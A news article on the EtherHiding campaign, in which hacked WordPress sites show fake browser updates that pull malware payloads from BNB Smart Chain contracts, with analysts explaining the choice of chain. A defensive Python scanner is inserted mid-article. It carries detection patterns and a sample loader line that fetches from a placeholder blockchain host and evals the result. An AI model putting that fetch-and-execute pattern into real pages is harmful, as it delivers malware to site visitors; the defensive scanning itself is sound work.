Network security analysts from 0xScope and CertiK suggest that threat actors may prefer to use BNB Smart Chain contracts because they are cheaper and less secure than Ethereum.
Network security analysts have revealed that, despite the name "EtherHiding," the new attack vector that hides malicious code in blockchain smart contracts has little to do with Ethereum.
According to Cointelegraph on October 16th, EtherHiding has been discovered as a new method for malicious actors to hide malicious payloads in smart contracts, with the ultimate goal of distributing malware to unsuspecting victims.
It is understood that these cybercriminals often prefer to use Binance's BNB Smart Chain.
Joe Green, a security researcher at blockchain security company CertiK, stated in an interview with Cointelegraph that this is mainly due to the lower cost of BNB Smart Chain.
The handling fees of BSC are much cheaper than ETH, but the network stability and speed are the same, because every update of the JavaScript payload is very cheap, which means there is no financial pressure.
The EtherHiding attack begins with hackers compromising WordPress websites and injecting code that retrieves a portion of the payload buried in Binance smart contracts. The website's front end is replaced by a fake browser update prompt which, when clicked, retrieves the JavaScript payload from the Binance blockchain.
Attackers often alter the malware payload and update website domains to evade detection. Green explained that this allows them to continuously provide users with the latest malware downloads disguised as browser updates.
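A defender can look for the injected loader described above by scanning a site's rendered HTML for inline scripts that both read from a blockchain and execute a string. The sketch below is an added example, not code from the article or the researchers; the marker patterns, the names `ScriptCollector` and `suspicious_scripts`, and the constructed sample page are assumptions of this example.

```python
import re
from html.parser import HTMLParser

# Heuristic markers: assumptions of this example, not indicators from the article.
MARKERS = {
    "chain_read": re.compile(r"eth_call|JsonRpcProvider|\.Contract\s*\(", re.I),
    "rpc_host": re.compile(r"https?://[\w.-]*(?:bsc|binance|bnbchain)[\w.-]*", re.I),
    "dynamic_exec": re.compile(r"\beval\s*\(|new\s+Function\s*\(", re.I),
}

class ScriptCollector(HTMLParser):
    """Collects the body of every inline <script> element."""
    def __init__(self):
        super().__init__()
        self.scripts, self._buf = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

def suspicious_scripts(html):
    """Flag inline scripts that both read from a chain and execute a string."""
    collector = ScriptCollector()
    collector.feed(html)
    flagged = []
    for index, js in enumerate(collector.scripts):
        hits = {name for name, rx in MARKERS.items() if rx.search(js)}
        if "dynamic_exec" in hits and hits & {"chain_read", "rpc_host"}:
            flagged.append((index, sorted(hits)))
    return flagged

# Constructed sample page: the host and the loader stand-in are placeholders.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example/theme.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>const c = new web3.eth.Contract(abi, addr); c.methods.price().call();</script>
<script>rpc("https://rpc.bsc.example", "eth_call").then(function (r) { eval(decode(r)); });</script>
</head><body>Update your browser</body></html>"""
if __name__ == "__main__":
    print(suspicious_scripts(SAMPLE_PAGE))
```

Requiring both a chain read and dynamic execution keeps ordinary Web3 front ends, such as the third script in the sample, from being flagged; a hit is a lead for manual review, not proof of compromise.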
Another reason may be the strengthening of Ethereum security-related reviews, according to security researchers at Web3 analytics company 0xScope.
Although we are unlikely to know the true motivation behind EtherHiding hackers using BNB Smart Chain instead of other blockchains in their plans, a possible factor is the strengthening of Ethereum security-related censorship.
They stated that due to systems such as Infura's IP address tracking for MetaMask transactions, hackers using Ethereum to inject malicious code may face a higher risk of being discovered.
The 0xScope team told Cointelegraph that they have recently tracked the flow of funds between hacker addresses on BNB Smart Chain and on Ethereum.
According to reports, the key address is associated with users of the NFT marketplace OpenSea and with Copper hosting services.
The payload of 18 identified hacker domains is updated daily. The company concludes that this complexity makes EtherHiding difficult to detect and prevent.